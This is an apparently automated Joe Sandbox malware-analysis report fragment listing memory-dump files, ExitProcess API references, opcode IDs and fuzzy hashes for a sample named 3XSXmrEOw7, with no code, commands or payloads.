                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 621844428-1254073115
                                                                                                                        • Opcode ID: c4be063b547142f42d0c13c4066b1a4a8f240d041d58b5e6cc6055d236f2c1ef
                                                                                                                        • Instruction ID: a72bb31166aa381497903e97bc9c24f5bcc4b6703112e4e099c378d301880388
                                                                                                                        • Opcode Fuzzy Hash: c4be063b547142f42d0c13c4066b1a4a8f240d041d58b5e6cc6055d236f2c1ef
                                                                                                                        • Instruction Fuzzy Hash: D06103A1D082649AF7218624DC447EB7A39DF50310F1440FED94DA72C1DABE0FC68B67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 621844428-1254073115
                                                                                                                        • Opcode ID: b61b37e6c1c3ce702835899ca951e94c148d5ddb985cd3c2e1f30e08d6961b1c
                                                                                                                        • Instruction ID: 908e1b507a0170028a9da51af9384c436a8bbe588f6ececa98b85f8372e705ec
                                                                                                                        • Opcode Fuzzy Hash: b61b37e6c1c3ce702835899ca951e94c148d5ddb985cd3c2e1f30e08d6961b1c
                                                                                                                        • Instruction Fuzzy Hash: CB5114A1D082648AF7218624DC447EB7A39DF91310F1440FED98DA76C1DABE0FD68B67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: GGN9$Windows 95
                                                                                                                        • API String ID: 621844428-3770922624
                                                                                                                        • Opcode ID: 35d5a47730b24da60319818b9ddf853cfb2f8b3c7cb5040908ea032ef5fb614c
                                                                                                                        • Instruction ID: 1e537a0af2ca5927453d0216449e8262732467145e920a59f4c5c1172cade705
                                                                                                                        • Opcode Fuzzy Hash: 35d5a47730b24da60319818b9ddf853cfb2f8b3c7cb5040908ea032ef5fb614c
                                                                                                                        • Instruction Fuzzy Hash: 0F31F5F2D041249EF3504654ED84BFB362CDB80320F24817FD84EA66C1EA7D5EC689A7
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: 2H?$Windows 95
                                                                                                                        • API String ID: 621844428-1577999745
                                                                                                                        • Opcode ID: 557803fb8bd20435206b454844b31fe281f146a0072662f4d932d07f3a7b7531
                                                                                                                        • Instruction ID: df9b69ad1b3a695b7739b8a46ca64f59184ba8a5aea23e33a92a66da250e7302
                                                                                                                        • Opcode Fuzzy Hash: 557803fb8bd20435206b454844b31fe281f146a0072662f4d932d07f3a7b7531
                                                                                                                        • Instruction Fuzzy Hash: 66F0BBE24041045EF3904514ED45BB7352DEBC0725F24857BE54DE59C0EB3D5EDA8962
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: XS
                                                                                                                        • API String ID: 621844428-3742125962
                                                                                                                        • Opcode ID: 0ef25803c13e20af9dc778cc44436636eddc744375c3422ed6ea6209976354ca
                                                                                                                        • Instruction ID: a598b56ad7ce94824c6271aba02b776f62d75a0bea01325358fd3efd258981fd
                                                                                                                        • Opcode Fuzzy Hash: 0ef25803c13e20af9dc778cc44436636eddc744375c3422ed6ea6209976354ca
                                                                                                                        • Instruction Fuzzy Hash: 575157F2D04154ABF7208A21DC44BAB7B78EBC1314F1881BBD90D63382D63D6EC6CA52
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: 65ed9145258f5a4505704d2105be48a53147dc18223b7f21a8b4a6edc79f2ac5
                                                                                                                        • Instruction ID: b5c5277cee7fc260ead8147ba84ca6eb3f3e9c1979ee068eb39e8a28ff91bfcc
                                                                                                                        • Opcode Fuzzy Hash: 65ed9145258f5a4505704d2105be48a53147dc18223b7f21a8b4a6edc79f2ac5
                                                                                                                        • Instruction Fuzzy Hash: A15115F2D041149FF7248A14DD45BFB7679EF80310F2481BBE84DA2780EA7D5EC58A66
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: e2842fda6e01ffc964cc67038059166aa85a9d0e01609f0bc19109ce1b98e191
                                                                                                                        • Instruction ID: 313057cb3b46385950b25b97b415f34978dc172aa2866f2568b428467c6bd824
                                                                                                                        • Opcode Fuzzy Hash: e2842fda6e01ffc964cc67038059166aa85a9d0e01609f0bc19109ce1b98e191
                                                                                                                        • Instruction Fuzzy Hash: 0641F3F1D041189AF7248A14DD45BFB7679EF80310F2081BBE949A2380EA3D1EC68A26
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: c372c9a1eb8374a87d414c5c73ded79d1c0e7af0199d784701ed0116f8e5fcc6
                                                                                                                        • Instruction ID: ab4b0dc805ec14251dad51e0dbf35e1a23775ed037f1a3276dace4db49703fd9
                                                                                                                        • Opcode Fuzzy Hash: c372c9a1eb8374a87d414c5c73ded79d1c0e7af0199d784701ed0116f8e5fcc6
                                                                                                                        • Instruction Fuzzy Hash: 524118F2D041149BF7148B24DD45BFB7679EF90310F1481BFE909A2780EA3D1EC58626
                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID: Windows 95
                                                                                                                        • API String ID: 621844428-1505401244
                                                                                                                        • Opcode ID: 9701c0c7ff79db85fca70d0c1f201ae6b3e783d81af0756f664c11b89e6fabce
                                                                                                                        • Instruction ID: 868afd68e3f4b1ed1163f8b7669db27d3b053efb1f64048eccbdb9cc034c9360
                                                                                                                        • Opcode Fuzzy Hash: 9701c0c7ff79db85fca70d0c1f201ae6b3e783d81af0756f664c11b89e6fabce
                                                                                                                        • Instruction Fuzzy Hash: C34117F2D041149BF7648B64ED497FB7675EF90310F1481BFE90AA2380EA3D1EC58A26
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
